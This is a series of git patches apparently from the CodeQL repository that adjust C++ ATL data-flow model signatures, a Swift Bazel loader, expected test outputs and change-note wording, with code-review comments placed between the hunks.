diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 455f7dfefee..d19345a1880 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -23,13 +23,13 @@ def _load_resource_dir(plat): if override: http_file( name = name, - downloaded_file_path = file, + downloaded_file_path = file.lower(), **override ) else: lfs_files( name = name, - srcs = ["//swift/third_party/resources:%s" % file], + srcs = ["//swift/third_party/resources:%s" % file.lower()], ) def _load_prebuilt(plat): @@ -52,14 +52,14 @@ def _load_prebuilt(plat): else: lfs_archive( name = name, - src = "//swift/third_party/resources:%s" % file, + src = "//swift/third_party/resources:%s" % file.lower(), build_file = build, ) # unused, but saves us some bazel mod tidy dance when in override mode lfs_files( name = name + "-download-only", - srcs = ["//swift/third_party/resources:%s" % file], + srcs = ["//swift/third_party/resources:%s" % file.lower()], ) def _github_archive(*, name, repository, commit, build_file = None, sha256 = None): From 904db38a5f3fae9580968a39fbbac3768c7f444b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:29:13 +0000 Subject: [PATCH 0900/1267] C++: Add missing space between type name and '&'. --- cpp/ql/lib/ext/CComBSTR.model.yml | 4 ++-- cpp/ql/lib/ext/CComSafeArray.model.yml | 4 ++-- cpp/ql/lib/ext/CPathT.model.yml | 4 ++-- cpp/ql/lib/ext/CRegKey.model.yml | 4 ++-- .../dataflow/external-models/flow.expected | 10 ++++----- .../external-models/validatemodels.expected | 8 +++---- .../taint-tests/test_mad-signatures.expected | 22 ++++++++++++++----- 7 files changed, 33 insertions(+), 23 deletions(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index 0cbf021a8a9..d281eb32dfb 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml 
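Review bot: `file.lower()` is repeated at each of the four use sites in `_load_resource_dir` and `_load_prebuilt` instead of being applied once where `file` is assigned, so any later use of `file` in these functions can reintroduce the mixed-case name. If the assignment, which is outside both hunks, allows it, lowercasing there with `file = file.lower()` would cover every use. A short comment stating that the artifacts under `//swift/third_party/resources` are stored with lowercase names would also record the rule this fix depends on.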
@@ -7,9 +7,9 @@ extensions: - ["", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(const CComBSTR &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml index 4128ae13e17..8da350ff140 100644 --- a/cpp/ql/lib/ext/CComSafeArray.model.yml +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml 
@@ -21,7 +21,7 @@ extensions: - ["", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] - ["", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - ["", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] - - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray &)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml index 8211343d479..870e7ac5536 100644 --- a/cpp/ql/lib/ext/CPathT.model.yml +++ b/cpp/ql/lib/ext/CPathT.model.yml 
@@ -15,8 +15,8 @@ extensions: - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"] - ["", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"] # Note: These don't work currently since we cannot use the template parameter in the name of the function - # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["", "CPathT", True, "operator const T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + # - ["", "CPathT", True, "operator T &", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 52b742029ac..45114347ee0 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CRegKey", True, "CRegKey", "(CRegKey&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] 
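Review bot: The two context rows for `RelativePathTo` and `RenameExtension` at the top of this hunk use `ReturnValue[-1]` as the output, a form no other row on this page uses. Rows that write to the qualifier use `Argument[-1]`, and return-value rows use `ReturnValue` or `ReturnValue[*]`. If the intent is flow into the `CPathT` object, the output column presumably should be `Argument[-1]`; as written these rows may produce no flow. That is worth confirming while the file is being touched.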
@@ -12,7 +12,7 @@ extensions: - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(DWORD&,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..137642d522a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
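Review bot: The last two context rows of this hunk keep `QueryValue` in the name column and put `operator HKEY` and `operator=` in the signature column, so they look like conversion and assignment operator models with the columns shifted by one. If so, they likely never match a callable, and the flow from a `CRegKey` to its `HKEY` goes unmodelled. The intended rows are presumably `["", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]` and the equivalent for `operator=`. This commit normalises signatures in the same file, so it would be a natural place to fix them.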
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 39dade25325..7b089db8a6d 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -11,14 +11,14 @@ | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | | Dubious signature "(CAtlFile &)" in summary model. | -| Dubious signature "(CRegKey&)" in summary model. | -| Dubious signature "(DWORD&,LPCTSTR)" in summary model. | +| Dubious signature "(CComBSTR &&)" in summary model. | +| Dubious signature "(CRegKey &)" in summary model. | +| Dubious signature "(DWORD &,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | | Dubious signature "(LPCTSTR,DWORD *,void *,ULONG *)" in summary model. | | Dubious signature "(LPTSTR,LPCTSTR,DWORD *)" in summary model. | -| Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComBSTR &)" in summary model. | | Dubious signature "(const CComSafeArray &)" in summary model. | -| Dubious signature "(const CComSafeArray&)" in summary model. | | Dubious signature "(const SAFEARRAY &)" in summary model. | | Dubious signature "(const SAFEARRAY *)" in summary model. | | Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 9284dc759eb..f1e4b841d87 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected 
@@ -6,6 +6,10 @@ signatureMatches | atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:407:8:407:8 | operator= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:407:8:407:8 | operator= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:409:3:409:10 | CComBSTR | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:409:3:409:10 | CComBSTR | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | | atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | @@ -14,6 +18,9 @@ signatureMatches | atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | | atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:415:3:415:10 | CComBSTR | (CComBSTR &&) | CComBSTR | CComBSTR | 0 | +| atl.cpp:418:11:418:16 | Append | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:418:11:418:16 | Append | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:419:11:419:16 | Append | (wchar_t) | CComBSTR | Append | 0 | | atl.cpp:420:11:420:16 | Append | (char) | CComBSTR | Append | 0 | | atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | 
@@ -31,6 +38,8 @@ signatureMatches | atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | | atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | | atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | @@ -357,9 +366,10 @@ signatureMatches | vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | (LPCOLESTR,int) | CComBSTR | Append | 1 | getSignatureParameterName | (CAtlFile &) | CAtlFile | CAtlFile | 0 | CAtlFile & | -| (CRegKey&) | CRegKey | CRegKey | 0 | CRegKey& | -| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD& | -| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | +| (CComBSTR &&) | CComBSTR | CComBSTR | 0 | CComBSTR && | +| (CRegKey &) | CRegKey | CRegKey | 0 | CRegKey & | +| (DWORD &,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD & | +| (DWORD &,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | | (HANDLE) | CAtlFile | CAtlFile | 0 | HANDLE | | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | HINSTANCE | | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | UINT | 
@@ -401,10 +411,10 @@ getSignatureParameterName | (UINT) | CComBSTR | LoadString | 0 | UINT | | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | UINT | | (char) | CComBSTR | Append | 0 | char | -| (const CComBSTR&) | CComBSTR | Append | 0 | const CComBSTR& | -| (const CComBSTR&) | CComBSTR | CComBSTR | 0 | const CComBSTR& | +| (const CComBSTR &) | CComBSTR | Append | 0 | const CComBSTR & | +| (const CComBSTR &) | CComBSTR | CComBSTR | 0 | const CComBSTR & | | (const CComSafeArray &) | CComSafeArray | CComSafeArray | 0 | const CComSafeArray & | -| (const CComSafeArray&) | CComSafeArray | operator= | 0 | const CComSafeArray& | +| (const CComSafeArray &) | CComSafeArray | operator= | 0 | const CComSafeArray & | | (const SAFEARRAY &) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY & | | (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | From 4024968e46a1a0d55ccdd64cda036ab66a73abf2 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:30:02 +0000 Subject: [PATCH 0901/1267] Rust: Accept integration test changes. --- rust/ql/integration-tests/hello-project/summary.expected | 1 + rust/ql/integration-tests/hello-workspace/summary.cargo.expected | 1 + .../hello-workspace/summary.rust-project.expected | 1 + 3 files changed, 3 insertions(+) diff --git a/rust/ql/integration-tests/hello-project/summary.expected b/rust/ql/integration-tests/hello-project/summary.expected index 44c14e790fe..6912eb2c52d 100644 --- a/rust/ql/integration-tests/hello-project/summary.expected +++ b/rust/ql/integration-tests/hello-project/summary.expected @@ -5,6 +5,7 @@ | Files extracted - total | 5 | | Files extracted - with errors | 1 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | 
diff --git a/rust/ql/integration-tests/hello-workspace/summary.cargo.expected b/rust/ql/integration-tests/hello-workspace/summary.cargo.expected index ec1abea6252..27545551f12 100644 --- a/rust/ql/integration-tests/hello-workspace/summary.cargo.expected +++ b/rust/ql/integration-tests/hello-workspace/summary.cargo.expected @@ -5,6 +5,7 @@ | Files extracted - total | 4 | | Files extracted - with errors | 0 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | diff --git a/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected b/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected index 5ca38e5a90c..40992231f2b 100644 --- a/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected +++ b/rust/ql/integration-tests/hello-workspace/summary.rust-project.expected @@ -5,6 +5,7 @@ | Files extracted - total | 4 | | Files extracted - with errors | 0 | | Files extracted - without errors | 4 | +| Files extracted - without errors % | 100 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From f7b55e05ebcc1163e7a725043b6d7aa6e29100fc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:30:34 +0000 Subject: [PATCH 0902/1267] C++: 'Attach' is value-preserving. --- cpp/ql/lib/ext/CComBSTR.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index d281eb32dfb..7ee43290ba3 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml 
@@ -19,7 +19,7 @@ extensions:
 - ["", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
 - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"]
 - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"]
- - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
+ - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"]
 - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", "manual"]
 - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
 - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"]
From 6388a9af95051c49f484be6f296f8ad3b9c0a248 Mon Sep 17 00:00:00 2001
From: Mathias Vorreiter Pedersen
Date: Fri, 6 Dec 2024 15:31:33 +0000
Subject: [PATCH 0903/1267] C++: Delete duplicated MaD row.
---
 cpp/ql/lib/ext/CComBSTR.model.yml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml
index 7ee43290ba3..cd3cd7b5075 100644
--- a/cpp/ql/lib/ext/CComBSTR.model.yml
+++ b/cpp/ql/lib/ext/CComBSTR.model.yml
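Review bot: The `Attach` row in CComBSTR.model.yml switches from `taint` to `value`, but the commit touches only the model file (its diffstat lists one file and one line), so nothing in this commit pins the new behaviour. A `value` summary is followed by plain data-flow configurations as well as taint tracking, so queries that never crossed this edge before may now report through it. A library test that tracks a source through `Attach` to a value-flow sink would confirm this is intended, although one may already exist elsewhere in the series. The `operator&` row changed in PATCH 0904 has the same gap. A comment above the row would record the reasoning, for example `# Attach takes ownership of the BSTR without copying, so the content is preserved`.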
@@ -26,7 +26,6 @@ extensions:
 - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"]
 - ["", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"]
 - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
- - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
 - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"]
 - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"]
 - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
From 66de42c576d64425456db4b7c7b1d45c085f18f8 Mon Sep 17 00:00:00 2001
From: Mathias Vorreiter Pedersen
Date: Fri, 6 Dec 2024 15:33:29 +0000
Subject: [PATCH 0904/1267] C++: Fix MaD row for 'operator&' on 'CComBSTR's.
---
 cpp/ql/lib/ext/CComBSTR.model.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml
index cd3cd7b5075..1865a244ef3 100644
--- a/cpp/ql/lib/ext/CComBSTR.model.yml
+++ b/cpp/ql/lib/ext/CComBSTR.model.yml
@@ -28,6 +28,6 @@ extensions:
 - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
 - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"]
 - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"]
- - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
 - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"]
 - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
\ No newline at end of file
From 5aa604b42ce687ff2e0aacf9a800acd6b5c1382a Mon Sep 17 00:00:00 2001
From: Calum Grant <42069085+calumgrant@users.noreply.github.com>
Date: Fri, 6 Dec 2024 15:34:57 +0000
Subject: [PATCH 0905/1267] Update cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md
Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com>
---
 cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md
index df9e13c0704..1bf77d55a61 100644
--- a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md
+++ b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md
@@ -1,4 +1,4 @@
 ---
 category: minorAnalysis
 ---
-* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) query no longer produces results when a string type has an extraction error.
+* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) no longer produces results when an argument type has an extraction error.
From e98129c402b2250b0cd0dfa0a08ab8124655a67c Mon Sep 17 00:00:00 2001
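Review bot: In the `operator&` row of CComBSTR.model.yml the output path and the kind change together, while the neighbouring `operator BSTR` row still maps `Argument[-1]` to `ReturnValue[*]` as `taint`, so two accessors that expose the same stored string now carry different kinds. If `operator&` returns a `BSTR *` as in ATL, `ReturnValue[*]` here is the BSTR handle, one indirection above the characters, whereas for `operator BSTR` the same path names the characters themselves. That difference is easy to misread, so a comment such as `# operator& returns BSTR*: ReturnValue[*] is the stored BSTR itself` above the row would help. It is also worth confirming whether `operator BSTR` should become `value` too, since the `Copy` row already uses `value` for `Argument[-1]` to `ReturnValue[*]`.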
From: Calum Grant <42069085+calumgrant@users.noreply.github.com>
Date: Fri, 6 Dec 2024 15:36:24 +0000
Subject: [PATCH 0906/1267] Update cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md
Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com>
---
 cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md
index 2004cd08248..c7ddd104ad0 100644
--- a/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md
+++ b/cpp/ql/src/change-notes/2024-12-05-badly-bounded-write.md
@@ -1,4 +1,4 @@
 ---
 category: minorAnalysis
 ---
-* The "Badly bounded write" query (`cpp/badly-bounded-write`) query no longer produces results if there is an extraction error in the type of the output buffer.
+* The "Badly bounded write" query (`cpp/badly-bounded-write`) no longer produces results if there is an extraction error in the type of the output buffer.
From 7e5e634bc7504b663b5fb33a7953ff1ed4e1a2e6 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan
Date: Fri, 6 Dec 2024 15:41:28 +0000
Subject: [PATCH 0907/1267] Update .expected files (no new results)
---
 .../go/frameworks/BeegoOrm/StoredXss.expected | 6 +++
 .../Security/CWE-078/StoredCommand.expected | 3 ++
 .../Security/CWE-079/ReflectedXss.expected | 39 ++++++++++++++
 .../Security/CWE-079/StoredXss.expected | 7 +++
 .../Security/CWE-089/SqlInjection.expected | 9 ++++
 .../Security/CWE-089/StringBreak.expected | 8 +++
 .../CWE-209/StackTraceExposure.expected | 8 +++
 .../CWE-312/CleartextLogging.expected | 53 +++++++++++++++++++
 .../Security/CWE-640/EmailInjection.expected | 36 +++++++++++++
 9 files changed, 169 insertions(+)
diff --git a/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected b/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected
index 861e3e97ed1..7524dd0f410 100644
